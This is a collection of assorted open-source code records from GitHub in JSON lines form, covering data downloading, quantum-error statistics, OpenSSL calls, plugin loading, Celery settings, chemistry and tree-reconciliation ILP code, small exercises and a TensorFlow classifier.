soup.select('a[rel=\"prev\"]')[0]\n url = 'http://xkcd.com' + prevLink.get('href')\n\nprint('Done.')\n","repo_name":"Atropos148/AutomateTheBoringStuff","sub_path":"dowloadXkcd.py","file_name":"dowloadXkcd.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"13502826751","text":"import argparse\nimport json\n\nimport sys\nfrom typing import List, Any\n\nimport sinter\nfrom sinter._csv_out import CSV_HEADER\nfrom sinter._existing_data import ExistingData\nfrom sinter._plotting import better_sorted_str_terms\n\n\ndef main_combine(*, command_line_args: List[str]):\n parser = argparse.ArgumentParser()\n parser.add_argument('--order',\n choices=('preserve', 'metadata', 'error'),\n default='metadata',\n help='Determines the order of output rows.\\n'\n ' metadata (default): sort ascending by metadata.'\n ' preserve: match order of input rows.\\n'\n ' error: sort ascending by error rate')\n parser.add_argument('rest',\n nargs=argparse.REMAINDER,\n type=str,\n help='Paths to CSV files containing sample statistics.')\n args = parser.parse_args(command_line_args)\n\n if args.rest:\n total = ExistingData()\n for path in args.rest:\n total += ExistingData.from_file(path)\n else:\n total = ExistingData.from_file(sys.stdin)\n\n if args.order == 'metadata':\n output = sorted(total.data.values(), key=lambda e: better_sorted_str_terms(json.dumps(e.json_metadata, separators=(',', ':'), sort_keys=True)))\n elif args.order == 'preserve':\n 
output = list(total.data.values())\n elif args.order == 'error':\n def err_rate_key(stats: sinter.TaskStats) -> Any:\n num_kept = stats.shots - stats.discards\n err_rate = 0 if num_kept == 0 else stats.errors / num_kept\n discard_rate = 0 if stats.shots == 0 else stats.discards / stats.shots\n return err_rate, discard_rate\n output = sorted(total.data.values(), key=err_rate_key)\n else:\n raise NotImplementedError(f'order={args.order}')\n\n print(CSV_HEADER)\n for value in output:\n print(value.to_csv_line())\n","repo_name":"Qcatty/Stim","sub_path":"glue/sample/src/sinter/_main_combine.py","file_name":"_main_combine.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"27"} +{"seq_id":"6379749876","text":"import subprocess\nimport os\nimport locale\nfrom termcolor import colored\nimport settings\nfrom colorama import init\n\ninit()\n\nos.environ['OPENSSL_CONF'] = './openssl.cnf'\n\nencoding = locale.getdefaultlocale()[1]\n\nOPENSSL_OUTPUT_COLOR = 'magenta'\n\n# Create openssl.cnf file\nimport jinja\ntemplate = jinja.from_string(open('openssl.cnf.template').read())\ncnf = template.render(BEE2EVP_ENGINE_LIBRARY_PATH=settings.BEE2EVP_ENGINE_LIBRARY_PATH)\ncnf_file = open('openssl.cnf', 'w')\ncnf_file.write(cnf)\ncnf_file.close()\n#########################\n\n\ndef openssl_call(cmd):\n\n print(colored('openssl ' + cmd, 'green'))\n p = subprocess.Popen(settings.OPENSSL_EXE_PATH + ' ' + cmd,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n stdin=subprocess.PIPE,\n shell=True)\n out, err_out = p.communicate()\n\n retcode = p.poll()\n if retcode:\n err_out = err_out.decode(encoding)\n print(colored(err_out, 'red', 'on_grey'))\n raise RuntimeError('Openssl call fails with status %s' % retcode)\n out = out.decode(encoding)\n print(colored(out, OPENSSL_OUTPUT_COLOR))\n return out\n","repo_name":"ppmi-bsu/btsl_test","sub_path":"openssl.py","file_name":"openssl.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"37702664018","text":"\ndef score(your_decision, opponent_decision, loses_to, correspondance):\n opp_numeric = correspondance[opponent_decision]\n yours_numeric = correspondance[your_decision]\n result = 0\n if (yours_numeric == opp_numeric): result = 3\n elif(loses_to[your_decision] != opponent_decision): result = 6\n return yours_numeric + result \n\nloses_to = {\n 'X': 'B',\n 'Y': 'C',\n 'Z': 'A',\n}\n\ncorrespondance = {\n 'A': 1,\n 'B': 2,\n 'C': 3,\n 'X': 1,\n 'Y': 2,\n 'Z': 3,\n}\n\nfilename = 'own_input'\nlines = open(filename).read().split('\\n')\nplays = [x.split(' ') for x in lines]\n\nprint(sum([score(play[1], play[0], loses_to, correspondance) for play in plays]))\n\n","repo_name":"Ale-PerazaGlez/AOC22","sub_path":"Day 2/day_2_star_1.py","file_name":"day_2_star_1.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"5068885980","text":"#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport collections\nimport itertools\nimport sys\n\nfrom oslo_config import cfg\nfrom oslo_log import log\n\nfrom heat.common import plugin_loader\n\nLOG = log.getLogger(__name__)\n\n\nclass PluginManager(object):\n \"\"\"A class for managing plugin modules.\"\"\"\n\n def __init__(self, *extra_packages):\n \"\"\"Initialise the Heat Engine plugin package, and any others.\n\n The heat.engine.plugins package is always created, if it does not\n exist, from the plugin directories specified in the config file, and\n searched for modules. In addition, any extra packages specified are\n also searched for modules. e.g.\n\n >>> PluginManager('heat.engine.resources')\n\n will load all modules in the heat.engine.resources package as well as\n any user-supplied plugin modules.\n \"\"\"\n def packages():\n for package_name in extra_packages:\n yield sys.modules[package_name]\n\n cfg.CONF.import_opt('plugin_dirs', 'heat.common.config')\n yield plugin_loader.create_subpackage(cfg.CONF.plugin_dirs,\n 'heat.engine')\n\n def modules():\n pkg_modules = map(plugin_loader.load_modules, packages())\n return itertools.chain.from_iterable(pkg_modules)\n\n self.modules = list(modules())\n\n def map_to_modules(self, function):\n \"\"\"Iterate over the results of calling a function on every module.\"\"\"\n return map(function, self.modules)\n\n\nclass PluginMapping(object):\n \"\"\"A class for managing plugin mappings.\"\"\"\n\n def __init__(self, names, *args, **kwargs):\n \"\"\"Initialise with the mapping name(s) and arguments.\n\n `names` can be a single name or a list of names. The first name found\n in a given module is the one used. Each module is searched for a\n function called _mapping() which is called to retrieve the\n mappings provided by that module. 
Any other arguments passed will be\n passed to the mapping functions.\n \"\"\"\n if isinstance(names, str):\n names = [names]\n\n self.names = ['%s_mapping' % name for name in names]\n self.args = args\n self.kwargs = kwargs\n\n def load_from_module(self, module):\n \"\"\"Return the mapping specified in the given module.\n\n If no such mapping is specified, an empty dictionary is returned.\n \"\"\"\n for mapping_name in self.names:\n mapping_func = getattr(module, mapping_name, None)\n if callable(mapping_func):\n fmt_data = {'mapping_name': mapping_name, 'module': module}\n try:\n mapping_dict = mapping_func(*self.args, **self.kwargs)\n except Exception:\n LOG.error('Failed to load %(mapping_name)s '\n 'from %(module)s', fmt_data)\n raise\n else:\n if isinstance(mapping_dict, collections.abc.Mapping):\n return mapping_dict\n elif mapping_dict is not None:\n LOG.error('Invalid type for %(mapping_name)s '\n 'from %(module)s', fmt_data)\n\n return {}\n\n def load_all(self, plugin_manager):\n \"\"\"Iterate over the mappings from all modules in the plugin manager.\n\n Mappings are returned as a list of (key, value) tuples.\n \"\"\"\n mod_dicts = plugin_manager.map_to_modules(self.load_from_module)\n return itertools.chain.from_iterable(d.items() for d\n in mod_dicts)\n","repo_name":"openstack/heat","sub_path":"heat/engine/plugin_manager.py","file_name":"plugin_manager.py","file_ext":"py","file_size_in_byte":4217,"program_lang":"python","lang":"en","doc_type":"code","stars":385,"dataset":"github-code","pt":"27"} +{"seq_id":"11983703135","text":"#!C:/Python27/ArcGIS10.2/python.exe\n#-*- coding:utf-8 -*-\n\"\"\"\n#============================================\n#\n# Project: mycelery\n# Name: The file name is celeryconfig\n# Purpose: \n# Auther: Administrator\n# Tel: 17372796660\n#\n#============================================\n#\n\"\"\"\nimport os\n\n#BORKER_URL='amqp://admin:Lantucx2018@localhost:5672/admin-vhost'\nBROKER_URL = 'amqp://guest:guest@localhost:5672//'\n\nCELERY_RESULT_BACKEND ='amqp://'\n\nCELERY_TIMEZONE='Asiz/Shanghai'\n\n\nCELERY_QUEUES={\n 'clip_tasks':{\n 'exchange':'clip_tasks',\n 'exchange_type':'direct',\n 'binding_key':'clip_tasks'\n },\n 'other_tasks': {\n 'exchange': 'other_tasks',\n 'exchange_type': 'direct',\n 'binding_key': 'other_tasks'\n }\n}\n\nCELERY_DEFAULT_QUEUE='clip_tasks'\n\nCELERY_IMPORTS=(\n 'celery_app.clipfromsde',\n)\n\n#防止死锁\nCELERY_FORCE_EXECV=True\n\n#允许重试\nCELERY_ACKS_LATE=True\n\n#设置并发worker数量\nCELERY_CONCURRENCY=2\n\n#每个worker最多执行100个任务被销毁\nCELERY_MAX_TASKS_PER_CHILD=100\n\n","repo_name":"176177082/RGSManageV3","sub_path":"celery_app/celeryconfig.py","file_name":"celeryconfig.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"28883609405","text":"import numpy as np\n\n\ndef mp2(hamiltonian, orbs, orbe, nocc, nvirt, verbose=False):\n ints = hamiltonian.i2\n moints = ints.transform_mp2(orbs, nocc)\n Evirt, Eocc = orbe[nocc:], orbe[:nocc]\n\n denominator = 1/(Eocc.reshape(-1, 1, 1, 1) - Evirt.reshape(1, -1, 1, 1) +\n Eocc.reshape(1, 1, -1, 1) - Evirt.reshape(1, 1, 1, -1))\n\n MP2corr_OS = np.einsum('iajb,iajb,iajb->', moints, moints, denominator)\n MP2corr_SS = np.einsum('iajb,iajb,iajb->', moints - moints.swapaxes(1,3), moints, denominator)\n return MP2corr_OS + MP2corr_SS\n\n\nif __name__ == '__main__': 
test_mp2()\n","repo_name":"Konjkov/pyquante2","sub_path":"pyquante2/pt/mp2.py","file_name":"mp2.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"27"} +{"seq_id":"29648534933","text":"from ete3 import Tree\nimport numpy as np\n\ndef createTreeRepresentation(t):\n i = 0\n for node in [n for n in t.traverse()][::-1]:\n node.add_feature('label', str(i))\n #node.name = str(i)\n i += 1\n\n g = np.zeros((i,i))\n for node in [n for n in t.traverse()][::-1]:\n if node.children == []:\n pos = int(node.label)\n g[pos][pos] = 1\n else:\n lchild = g[int(node.children[0].label)]\n rchild = g[int(node.children[1].label)]\n me = int(node.label)\n for k in range(len(g[0])):\n g[me][k] = max(lchild[k], rchild[k])\n g[me][me] = 1\n\n return g\n\ndef createDistMatrix(host):\n size = len([node for node in host.traverse()])\n d = np.zeros((size, size), dtype=int)\n for a in host.traverse():\n for b in host.traverse():\n i, j = int(a.label), int(b.label)\n if i < j:\n d[i][j] = a.get_distance(b, topology_only=True)\n elif i > j:\n d[i][j] = b.get_distance(a, topology_only=True)\n else:\n d[i][j] = 0\n return d\n\ndef createMapping(mapping):\n newmap = {}\n for node in mapping:\n newmap[int(node.label)] = int(mapping[node].label)\n return newmap\n\ndef addcolumn(var, coeff, eqname, coldict):\n entry = \" \" + var + \"\\t\" + eqname + '\\t' + str(coeff)\n if var in coldict:\n coldict[var].append(entry)\n else:\n coldict[var] = [entry]\n\ndef addrhs(eqname, val, rhs):\n rhs.append(\" RHS1\\t\" + eqname + '\\t' + str(val))\n\ndef namevar(varname, ids):\n out = varname\n for i in ids:\n out += \"_\" + str(i)\n return out\n\ndef createEqns(h, g, hrep, grep, mapping, distmat, eqns='ALL'):\n eqnames = []\n rhs = []\n coldict = {}\n\n #COST\n eqnames.append(\" N COST\")\n\n for u in g.traverse():\n if u.children == []:\n addcolumn(namevar(\"X\", [u.label, u.label]), 2, \"COST\", coldict)\n else:\n addcolumn(namevar(\"X\", [u.label, u.label]), 4, \"COST\", coldict)\n v, w = u.children\n for i in range(len(hrep)):\n for j in range(len(hrep)):\n addcolumn(namevar(\"Y\", [u.label, v.label, i, j]), distmat[i][j]-1, \"COST\", coldict)\n addcolumn(namevar(\"Y\", [u.label, w.label, i, j]), distmat[i][j]-1, \"COST\", coldict)\n for k in range(1,6):\n #c = -1.5\n c = -2\n coeff = c * ((k - 1.) 
/ k)\n addcolumn(namevar(\"T\", [u.label, k]), coeff, \"COST\", coldict)\n\n #(0.0) - Mapping Equalities\n if eqns == \"ALL\" or 0 in eqns:\n eqcounter = 0\n for u in mapping:\n for i in range(len(hrep)):\n varname = namevar(\"M\", [u, i])\n eqname = \"INVAR\" + str(eqcounter)\n eqnames.append(\" E \" + eqname)\n eqcounter += 1\n if mapping[u] == i:\n addrhs(eqname, 1, rhs)\n else:\n addrhs(eqname, 0, rhs)\n addcolumn(varname, 1, eqname, coldict)\n\n #(0.1) - Duplication Invariants\n if eqns == \"ALL\" or 0 in eqns:\n eqcounter = 0\n for u in g:\n assert u.children == []\n varname = namevar(\"X\", [u.label, u.label])\n eqname = \"DUP_INVAR\" + str(eqcounter)\n eqnames.append(\" E \" + eqname)\n eqcounter += 1\n addrhs(eqname, 0, rhs)\n addcolumn(varname, 1, eqname, coldict)\n\n #(2)\n if eqns == \"ALL\" or 2 in eqns:\n eqcounter = 0\n for u in g.traverse():\n if u.children == []:\n continue\n v, w = u.children\n for i in range(len(hrep)):\n for j in range(len(hrep)):\n if hrep[i][j] == 0:\n\n parent = namevar(\"M\", [u.label, i])\n child1 = namevar(\"M\", [v.label, j])\n\n eqname = \"MAP\" + str(eqcounter)\n eqnames.append(\" L \" + eqname)\n eqcounter += 1\n addrhs(eqname, 1, rhs)\n addcolumn(parent, 1, eqname, coldict)\n addcolumn(child1, 1, eqname, coldict)\n\n child2 = namevar(\"M\", [w.label, j])\n\n eqname = \"MAP\" + str(eqcounter)\n eqnames.append(\" L \" + eqname)\n eqcounter += 1\n addrhs(eqname, 1, rhs)\n addcolumn(parent, 1, eqname, coldict)\n addcolumn(child2, 1, eqname, coldict)\n\n #(3)\n if eqns == \"ALL\" or 3 in eqns:\n eqcounter = 0\n for u in range(len(grep)):\n for v in range(len(grep)):\n if u == v:\n continue\n eqname = \"SMAP\" + str(eqcounter)\n eqnames.append(\" L \" + eqname)\n eqcounter += 1\n addrhs(eqname, 0, rhs)\n addcolumn(namevar(\"X\", [u, v]), 1, eqname, coldict)\n for i in range(len(hrep)):\n addcolumn(namevar(\"Z\", [u, v, i]), -1, eqname, coldict)\n\n #(4)\n if eqns == \"ALL\" or 4 in eqns:\n eqcounter = 0\n for u in range(len(grep)):\n for v in range(len(grep)):\n for i in range(len(hrep)):\n\n #4.1\n eqname = \"SAMEMAP\" + str(eqcounter)\n eqnames.append(\" G \" + eqname)\n\n addrhs(eqname, -1, rhs)\n addcolumn(namevar(\"Z\", [u, v, i]), 1, eqname, coldict)\n addcolumn(namevar(\"M\", [u, i]), -1, eqname, coldict)\n addcolumn(namevar(\"M\", [v, i]), -1, eqname, coldict)\n\n #4.2\n eqname = \"SAMEUI\" + str(eqcounter)\n eqnames.append(\" L \" + eqname)\n\n addrhs(eqname, 0, rhs)\n addcolumn(namevar(\"Z\", [u, v, i]), 1, eqname, coldict)\n addcolumn(namevar(\"M\", [u,i]), -1, eqname, coldict)\n\n #4.3\n eqname = \"SAMEVI\" + str(eqcounter)\n eqnames.append(\" L \" + eqname)\n\n addrhs(eqname, 0, rhs)\n addcolumn(namevar(\"Z\", [u, v, i]), 1, eqname, coldict)\n addcolumn(namevar(\"M\", [v, i]), -1, eqname, coldict)\n\n eqcounter += 1\n\n #(5)\n if eqns == \"ALL\" or 5 in eqns:\n eqcounter = 0\n for u in range(len(grep)):\n for v in range(len(grep)):\n if u == v:\n continue\n eqname = \"NOANC\" + str(eqcounter)\n eqnames.append(\" L \" + eqname)\n addrhs(eqname, 1 - grep[u][v], rhs)\n addcolumn(namevar(\"X\", [u, v]), 1, eqname, coldict)\n\n eqcounter += 1\n\n #(6)\n if eqns == \"ALL\" or 6 in eqns:\n eqcounter = 0\n for u in range(len(grep)):\n for v1 in range(len(grep)):\n if u == v1:\n continue\n for v2 in range(v1 + 1, len(grep)):\n if grep[v1][v2] + grep[v2][v1] == 0:\n continue\n eqname = \"LARGEDUP\" + str(eqcounter)\n eqnames.append(\" L \" + eqname)\n addrhs(eqname, 1, rhs)\n addcolumn(namevar(\"X\", [u, v1]), 1, eqname, coldict)\n 
addcolumn(namevar(\"X\", [u, v2]), 1, eqname, coldict)\n\n eqcounter += 1\n\n #(7)\n if eqns == \"ALL\" or 7 in eqns:\n eqcounter = 0\n\n def do6(u, v, a, b, eqcounter):\n if grep[u][a] * grep[v][b] == 0 and grep[a][u] * grep[v][b] == 0:\n return eqcounter\n eqname = \"DUPCROSS\" + str(eqcounter)\n eqnames.append(\" L \" + eqname)\n addrhs(eqname, 1, rhs)\n addcolumn(namevar(\"X\", [u, v]), 1, eqname, coldict)\n addcolumn(namevar(\"X\", [a, b]), 1, eqname, coldict)\n\n return eqcounter + 1\n\n for u in range(len(grep)):\n for v in range(u+1, len(grep)):\n for a in range(v+1, len(grep)):\n for b in range(a+1, len(grep)):\n eqcounter = do6(u,v,a,b,eqcounter)\n eqcounter = do6(u,a,v,b,eqcounter)\n eqcounter = do6(u,b,a,v,eqcounter)\n\n\n #(9)\n if eqns == \"ALL\" or 9 in eqns:\n eqcounter = 0\n for u in g.traverse():\n if u.children == []:\n continue\n v,w = u.children\n for i in range(len(hrep)):\n for j in range(len(hrep)):\n eqname = \"DUP\" + str(eqcounter)\n eqnames.append(\" G \" + eqname)\n eqcounter += 1\n addrhs(eqname, 0, rhs)\n addcolumn(namevar(\"X\", [u.label, u.label]), 1, eqname, coldict)\n coeff = (hrep[i][j] + hrep[j][i]) / -2.0\n varname = namevar(\"Y\", [v.label, w.label, i, j])\n addcolumn(varname, coeff, eqname, coldict)\n\n #(10)\n if eqns == \"ALL\" or 10 in eqns:\n\n def do9(u, v, i, j, eqcounter):\n\n #9.1\n eqname = \"DUPAND\" + str(eqcounter)\n eqnames.append(\" G \" + eqname)\n\n addrhs(eqname, -1, rhs)\n addcolumn(namevar(\"Y\", [u.label, v.label, i, j]), 1, eqname, coldict)\n addcolumn(namevar(\"M\", [u.label, i]), -1, eqname, coldict)\n addcolumn(namevar(\"M\", [v.label, j]), -1, eqname, coldict)\n\n #9.2\n eqname = \"DUPUI\" + str(eqcounter)\n eqnames.append(\" L \" + eqname)\n\n addrhs(eqname, 0, rhs)\n addcolumn(namevar(\"Y\", [u.label, v.label, i, j]), 1, eqname, coldict)\n addcolumn(namevar(\"M\", [u.label, i]), -1, eqname, coldict)\n\n #9.3\n eqname = \"DUPVJ\" + str(eqcounter)\n eqnames.append(\" L \" + eqname)\n\n addrhs(eqname, 0, rhs)\n addcolumn(namevar(\"Y\", [u.label, v.label, i, j]), 1, eqname, coldict)\n addcolumn(namevar(\"M\", [v.label, j]), -1, eqname, coldict)\n\n return eqcounter + 1\n\n eqcounter = 0\n for u in g.traverse():\n if u.children == []:\n continue\n v, w = u.children\n for i in range(len(hrep)):\n for j in range(len(hrep)):\n eqcounter = do9(u, v, i, j, eqcounter)\n eqcounter = do9(u, w, i, j, eqcounter)\n eqcounter = do9(v, w, i, j, eqcounter)\n eqcounter = do9(w, v, i, j, eqcounter)\n\n #(11)\n if eqns == \"ALL\" or 11 in eqns:\n eqcounter = 0\n for i in range(len(grep)):\n eqname = \"UMAP\" + str(eqcounter)\n eqnames.append(\" E \" + eqname)\n eqcounter += 1\n addrhs(eqname, 1, rhs)\n for j in range(len(hrep)):\n addcolumn(namevar(\"M\", [i, j]), 1, eqname, coldict)\n\n #(12)\n if eqns == \"ALL\" or 12 in eqns:\n eqcounter = 0\n for u in range(len(grep)):\n for v in range(len(grep)):\n if u == v:\n continue\n eqname = \"TDMAX\" + str(eqcounter)\n eqnames.append(\" L \" + eqname)\n addrhs(eqname, 0, rhs)\n addcolumn(namevar(\"X\", [u, v]), 1, eqname, coldict)\n addcolumn(namevar(\"X\", [u, u]), -1, eqname, coldict)\n\n eqname = \"TDEQUAL\" + str(eqcounter)\n eqnames.append(\" E \" + eqname)\n addrhs(eqname, 0, rhs)\n addcolumn(namevar(\"X\", [u, v]), 1, eqname, coldict)\n addcolumn(namevar(\"X\", [v, u]), -1, eqname, coldict)\n\n eqcounter += 1\n\n #(13)\n if eqns == \"ALL\" or 13 in eqns:\n\n eqcounter = 0\n #(13.1)\n for u in range(len(grep)):\n eqname = \"TDSIZE\" + str(eqcounter)\n eqnames.append(\" L \" + eqname)\n 
addrhs(eqname, 1, rhs)\n            for k in range(1,6):\n                addcolumn(namevar(\"T\", [u, k]), 1, eqname, coldict)\n            eqcounter += 1\n\n        #(13.2)\n        eqcounter = 0\n        for u in range(len(grep)):\n            for k in range(1,6):\n                eqname = \"TDLEQ\" + str(eqcounter)\n                eqnames.append(\" L \" + eqname)\n                addrhs(eqname, 0, rhs)\n                addcolumn(namevar(\"T\", [u, k]), 1, eqname, coldict)\n                for v in range(len(grep)):\n                    addcolumn(namevar(\"X\", [u, v]), -1./k, eqname, coldict)\n                eqcounter += 1\n\n\n    return eqnames, rhs, coldict\n\ndef write(filename, eqnames, rhs, coldict):\n    f = open(filename, 'w')\n    f.write(\"NAME TREESOLVE\\nROWS\\n\")\n\n    for line in eqnames:\n        f.write(line + '\\n')\n\n    f.write(\"COLUMNS\\n    MARK0000\\t'MARKER'\\t'INTORG'\\n\")\n    for var in sorted(coldict.keys()):\n        for stmt in coldict[var]:\n            f.write(stmt +'\\n')\n    f.write(\"    MARK0000\\t'MARKER'\\t'INTEND'\\n\")\n\n    f.write(\"RHS\\n\")\n    for line in rhs:\n        f.write(line + '\\n')\n\n    f.write(\"ENDATA\")\n    f.close()\n\ndef extractMapping(m, host, guest):\n    \"\"\"\n    Extracts a mapping from model m. Can only be called after m.optimize().\n    Assumes mapping is stored in M_X_Y variables, finds those that are set to 1.\n\n    Args:\n        m (gurobipy model): The model object containing the ILP solution\n    \n    Outputs:\n        mapping (dict): guest -> host mapping of all nodes in the guest tree\n    \"\"\"\n    labelMapping = {}\n    for item in m.getVars():\n        if item.x == 1 and item.varName[0] == 'M':\n            vals = item.varName.split(\"_\")\n            labelMapping[vals[1]] = vals[2]\n\n    labelToHost = {}\n    for node in host.traverse():\n        labelToHost[node.label] = node\n\n    mapping = {}\n    for node in guest.traverse():\n        hnode = labelToHost[labelMapping[node.label]]\n        mapping[node] = hnode\n\n    return mapping\n","repo_name":"Singh-Lab/treeSim","sub_path":"ilp_generator.py","file_name":"ilp_generator.py","file_ext":"py","file_size_in_byte":14028,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"70283519111","text":"\"\"\"\nWrite a program that reads a year (an integer value) and prints whether it is a leap year or not.\nNote: a year is a leap year if it is a multiple of 400, or if it is a multiple of 4 but not\na multiple of 100.\n\"\"\"\n\nano = int(input(\"Enter the year: \"))\n\nif (ano % 400 == 0) or (ano % 4 == 0 and ano % 100 != 0):\n    print(\"\\nThe year is a leap year\")\nelse:\n    print(\"\\nThe year is not a leap year\")","repo_name":"enzoeferreira/MC102","sub_path":"Listas/1_08.py","file_name":"1_08.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"18451291761","text":"def Dfs(pos, ans):\n    if (len(pre[pos]) == 0):\n        # print(ans)\n        if (len(ans) == maxn):\n            # print(ans)\n            anss.append(tuple(ans))\n        return\n    for i in pre[pos]:\n        ans.append(i)\n        Dfs(i, ans)\n        ans.pop()\n\na = list(map(int, input().split()))\nm = int(input())\nn = len(a)\ndp = [1 for i in range(n)]\npre = [[] for i in range(n)]\nmaxn = 0\nfor i in range(n):\n    for j in range(i):\n        if (a[j] < a[i]):\n            dp[i] = max(dp[i], dp[j] + 1)\n            # pre[i].append(j)\n    maxn = max(maxn, dp[i])\n    for j in range(i):\n        if (a[j] < a[i] and dp[j] + 1 == dp[i]):\n            pre[i].append(j)\nprint(maxn)\nanss = []\nfor i in range(n - 1, -1, -1):\n    p = i\n    ans = [i]\n    Dfs(p, ans)\nanss.sort(reverse = True)\nansss = []\nfor i in anss:\n    ansss.append(list(i))\nfor i in range(len(ansss)):\n    ansss[i].reverse()\nfor i in range(min(len(ansss), m)):\n    for j in range(len(ansss[i])):\n        print(ansss[i][j] + 1, end = ' ' if j != maxn - 1 else '\\n')\nif 
(len(ansss) < m):\n    print(\"Can't find more\")\n","repo_name":"hello-world2005/course","sub_path":"学校/信息技术/XJCS/62.py","file_name":"62.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"16145221909","text":"import speech_recognition as sr\n\nr = sr.Recognizer()\naudio_file = sr.AudioFile(\"Vatterode_Kunstscheune_Kaschuba.wav\")\n\nwith audio_file as source:\n    r.adjust_for_ambient_noise(source)\n    audio = r.record(source, 10)\n    text = r.recognize_google(audio, language=\"de\")\n    print(text)\n\n\n","repo_name":"MarcTheSpark/bkp","sub_path":"Python/old/speech_analyze.py","file_name":"speech_analyze.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"72892440072","text":"\"\"\"\nTask 32: Determine the indices of the elements of an array (list)\nwhose values belong to a given range (i.e. not less than\na given minimum and not greater than a given\nmaximum)\n\"\"\"\n\n\nminimum = int(input('Enter the minimum: '))\nmaximum = int(input('Enter the maximum: '))\nn = int(input('Enter the array length: '))\narray = []\nresult = []\n\nfor i in range(0, n):  # read all n values\n\tarray.append(int(input('Enter a number: ')))\n\nprint('Original array - ', array)\n\nfor index, value in enumerate(array):\n\tif value >= minimum and value <= maximum: \n\t\tresult.append(index)\n\n\nprint('Result - ', result)\n","repo_name":"Altirius/learning-python","sub_path":"6_занятие/32/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"19564572466","text":"import datetime\nimport time\n\n\nfilename = 'covid.txt'\nrefresh_time = '23:00:00'\nwith open(filename, \"r\") as file:\n    first_line = file.readline()\n    \n\n    \ndate_time_str = first_line # previous data loading time\nprint ( \"date_time_str\"+date_time_str)\ndate_time_str = date_time_str.replace(\"\\n\",'')\nformat = \"%b %d %Y at %I:%M%p\"\n\nstart_time = datetime.datetime.now().strftime(format)\nend_time = datetime.datetime.strptime(date_time_str,format)\nprint('start time:' + start_time )\nprint('end time:' + str(end_time))\n\ntotal_time= datetime.datetime.strptime(start_time,format) - datetime.datetime.strptime(date_time_str,format)\n\n\n\nprint (total_time)\nif total_time.days >= 1:\n    print (\"Time to refresh\")\n    \nelse:\n    print (\"comparing hours....\")\n    if ',' in str(total_time):\n        t = (str(total_time).split(',')[1]).replace(' ','')\n        t1 = datetime.datetime.strptime(t, '%H:%M:%S')\n        print (t)\n    else :\n        t = str(total_time)\n        t1 = datetime.datetime.strptime(t, '%H:%M:%S')\n    \n    t2 = datetime.datetime.strptime(refresh_time, '%H:%M:%S')\n    \n    \n    if t1.time() > t2.time():\n        print (\"It's time to refresh\")\n    else:\n        print (\"Hang in there\")\n    \n    \n\n\n\n","repo_name":"Pradnya1208/Desktop_notification_tkinter_plyer","sub_path":"timeDiff.py","file_name":"timeDiff.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"29533292648","text":"import preprocessing\nimport numpy as np\nimport tensorflow as tf\nimport tensorflow.contrib.slim as slim\nimport argparse\nfrom datetime import datetime\nimport sklearn\n\n\nclass Classifier:\n    def __init__(self, scope, img_w, img_h, n_classes, dropout_keep_prob=1.0, learning_rate=1e-3):\n        \"\"\"Defining the 
model.\"\"\"\n\n self.scope = scope\n self.n_classes = n_classes\n self.dropout_keep_prob = dropout_keep_prob\n\n self.input = tf.placeholder(tf.float32, [None, img_h, img_w, 1])\n\n self.conv1 = slim.conv2d(\n self.input,\n num_outputs=32, kernel_size=[3, 8],\n stride=[1, 1], padding='Valid',\n scope=self.scope+'_conv1'\n )\n self.conv2 = slim.conv2d(\n self.conv1,\n num_outputs=64, kernel_size=[5, 5],\n stride=[2, 2], padding='Valid',\n scope=self.scope+'_conv2'\n )\n self.conv3 = slim.conv2d(\n self.conv2,\n num_outputs=128, kernel_size=[5, 5],\n stride=[2, 2], padding='Valid',\n scope=self.scope+'_conv3'\n )\n self.pool = slim.max_pool2d(self.conv3, [2, 2])\n\n self.hidden = slim.fully_connected(\n slim.flatten(self.pool),\n 512,\n scope=self.scope+'_hidden',\n activation_fn=tf.nn.relu\n )\n self.classes = slim.fully_connected(\n tf.nn.dropout(self.hidden, self.dropout_keep_prob),\n self.n_classes,\n scope=self.scope+'_fc',\n activation_fn=None\n )\n\n self.targets = tf.placeholder(tf.int32, [None])\n self.targets_onehot = tf.one_hot(self.targets, self.n_classes)\n self.loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(\n labels=self.targets_onehot,\n logits=self.classes\n ))\n self.train_step = tf.train.RMSPropOptimizer(learning_rate=learning_rate).minimize(self.loss)\n\n\nclass FineTuningClassifier:\n def __init__(self, scope, img_w, img_h, n_classes, dropout_keep_prob=1.0, learning_rate=1e-3):\n \"\"\"Defining the model for fine tuning.\"\"\"\n\n self.scope = scope\n self.n_classes = n_classes\n self.dropout_keep_prob = dropout_keep_prob\n\n self.input = tf.placeholder(tf.float32, [None, img_h, img_w, 1])\n\n self.conv1 = 